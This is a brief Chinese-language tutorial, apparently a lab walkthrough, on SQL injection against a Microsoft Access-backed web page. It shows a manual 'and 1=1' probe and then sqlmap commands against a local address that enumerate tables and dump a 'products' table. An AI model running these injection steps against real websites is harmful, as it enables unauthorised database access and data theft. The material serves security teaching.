简介
Access数据库注入攻击是一种常见的网络安全,通过注入SQL代码来获取未授权的数据访问权限。这种攻击利用了应用程序与数据库之间的交互漏洞,攻击者通过输入特定的SQL代码片段来操纵数据库查询,从而绕过应用程序的安全机制,获取信息或执行操作。
以下是具体的操作流程:
1、打开⽹⻚判断是否存在注⼊
使用命令 ?id=14 and 1=1 确定为数字注入
2、⽤sqlmap⼯具扫描注⼊点
使用kali自带sqlmap系统
使用语句 sqlmap -u http://192.168.10.101/news_view.asp?id=14
如下图则说明存在sql注⼊
3、查询表名
因为access数据库没有库,使用语句 sqlmap -u http://192.168.10.101/news_view.asp?id=14 --tables --batch 即可查询表名
4、查询列名
使用语句 sqlmap -u http://192.168.10.101/news_view.asp?id=14 -T products --dump --batch
以此可以得出相关数据
安全
网络安全靠人民,网络安全为人民
